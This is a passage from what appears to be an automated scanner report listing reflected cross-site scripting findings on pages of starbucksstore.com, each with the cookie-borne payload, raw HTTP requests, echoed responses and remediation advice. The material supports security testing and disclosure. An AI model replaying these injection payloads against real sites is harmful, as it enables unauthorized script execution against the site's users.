Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB8163c</script><script>alert(1)</script>ec3893ac889;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21224
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:45:50 GMT
Connection: close

<!--S1--><!--S0-->        
   <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
   <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
   <meta name="description" content="F
...[SNIP]...
ines. */
   var s_pageName="HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="HomePage"
   var s_prop3="SBPTPAHP1SHTB8163C</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>EC3893AC889"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_state=""

...[SNIP]...

3.49. http://www.starbucksstore.com/entertainment [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /entertainment

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cdb1e</script><script>alert(1)</script>221b4ee20e3 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entertainment HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBcdb1e</script><script>alert(1)</script>221b4ee20e3;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16383
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:01 GMT
Connection: close

<!--S1--><!--S0-->    
       <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="description" conte
...[SNIP]...
rbucks Entertainment"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Entertainment"
   var s_prop3="SBPTPAHP1SHTBCDB1E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>221B4EE20E3"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/entertainment/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   va
...[SNIP]...

3.50. http://www.starbucksstore.com/entertainment/ [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /entertainment/

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 687ff</script><script>alert(1)</script>a3b2dc7f084 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entertainment/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB687ff</script><script>alert(1)</script>a3b2dc7f084;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16383
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:44:12 GMT
Connection: close

<!--S1--><!--S0-->    
       <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="description" conte
...[SNIP]...
rbucks Entertainment"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Entertainment"
   var s_prop3="SBPTPAHP1SHTB687FF</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>A3B2DC7F084"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/entertainment/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   va
...[SNIP]...

3.51. http://www.starbucksstore.com/extras/newsletters.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /extras/newsletters.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b33f</script><script>alert(1)</script>b422eca8919 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /extras/newsletters.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB2b33f</script><script>alert(1)</script>b422eca8919;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16365
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:45:14 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
ame="/extras/newsletters.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/extras/newsletters.asp"
   var s_prop3="SBPTPAHP1SHTB2B33F</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>B422ECA8919"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/extras/newsletters.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s
...[SNIP]...

3.52. http://www.starbucksstore.com/guestassist/ga_faq_shipop.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /guestassist/ga_faq_shipop.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30c1e</script><script>alert(1)</script>c2c9791a405 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /guestassist/ga_faq_shipop.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB30c1e</script><script>alert(1)</script>c2c9791a405;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42766
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:31 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
ist/ga_faq_shipop.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/guestassist/ga_faq_shipop.asp"
   var s_prop3="SBPTPAHP1SHTB30C1E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>C2C9791A405"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/guestassist/ga_faq_shipop.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
...[SNIP]...

3.53. http://www.starbucksstore.com/guestassist/gareturns.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /guestassist/gareturns.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1de33</script><script>alert(1)</script>0be688d889d was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /guestassist/gareturns.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB1de33</script><script>alert(1)</script>0be688d889d;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15086
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:32 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
guestassist/gareturns.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/guestassist/gareturns.asp"
   var s_prop3="SBPTPAHP1SHTB1DE33</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>0BE688D889D"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/guestassist/gareturns.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   va
...[SNIP]...

3.54. http://www.starbucksstore.com/guestassist/shcontus.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /guestassist/shcontus.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a945e</script><script>alert(1)</script>f60d28581e3 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /guestassist/shcontus.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBa945e</script><script>alert(1)</script>f60d28581e3;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20651
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:23 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
"/guestassist/shcontus.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/guestassist/shcontus.asp"
   var s_prop3="SBPTPAHP1SHTBA945E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>F60D28581E3"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/guestassist/shcontus.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var
...[SNIP]...

3.55. http://www.starbucksstore.com/mya/links.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /mya/links.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddee2</script><script>alert(1)</script>8b507b6fff0 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mya/links.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBddee2</script><script>alert(1)</script>8b507b6fff0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15659
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:05 GMT
Connection: close

<!--S1--><!--S0-->
<!--INCLUDE VIRTUAL ="/registry/include/funcsRegistry.asp"-->


<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Cont
...[SNIP]...
. */
   var s_pageName="/mya/links.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/mya/links.asp"
   var s_prop3="SBPTPAHP1SHTBDDEE2</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>8B507B6FFF0"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/mya/links.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_state=""
...[SNIP]...

3.56. http://www.starbucksstore.com/mya/track.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /mya/track.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 860c7</script><script>alert(1)</script>9b9756a0816 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mya/track.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB860c7</script><script>alert(1)</script>9b9756a0816;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18382
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:07 GMT
Connection: close

<!--S1--><!--S0-->
<!--INCLUDE VIRTUAL ="/registry/include/funcsRegistry.asp"-->


<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Cont
...[SNIP]...
. */
   var s_pageName="/mya/track.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/mya/track.asp"
   var s_prop3="SBPTPAHP1SHTB860C7</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>9B9756A0816"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/mya/track.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_state=""
...[SNIP]...

3.57. http://www.starbucksstore.com/products/include/SearchNav.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/include/SearchNav.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6b5c</script><script>alert(1)</script>9153adaaf8c was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/include/SearchNav.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBd6b5c</script><script>alert(1)</script>9153adaaf8c;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14427
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:44:17 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
Name="Search Listing:"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/products/shprodli.asp"
   var s_prop3="SBPTPAHP1SHTBD6B5C</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>9153ADAAF8C"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/products/shprodli.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9="Search Listing: Internal: "
   var s_prop10=""
   /* E-commerce Variables */
   
...[SNIP]...

3.58. http://www.starbucksstore.com/products/shabotus.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/shabotus.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a282</script><script>alert(1)</script>e390fba785c was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/shabotus.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB3a282</script><script>alert(1)</script>e390fba785c;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14484
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:41:38 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
products/shabotus.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/products/shabotus.asp"
   var s_prop3="SBPTPAHP1SHTB3A282</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>E390FBA785C"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/products/shabotus.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_
...[SNIP]...

3.59. http://www.starbucksstore.com/products/shourplg.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/shourplg.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d15c0</script><script>alert(1)</script>f0bd362f13 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/shourplg.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBd15c0</script><script>alert(1)</script>f0bd362f13;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25377
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:43:10 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
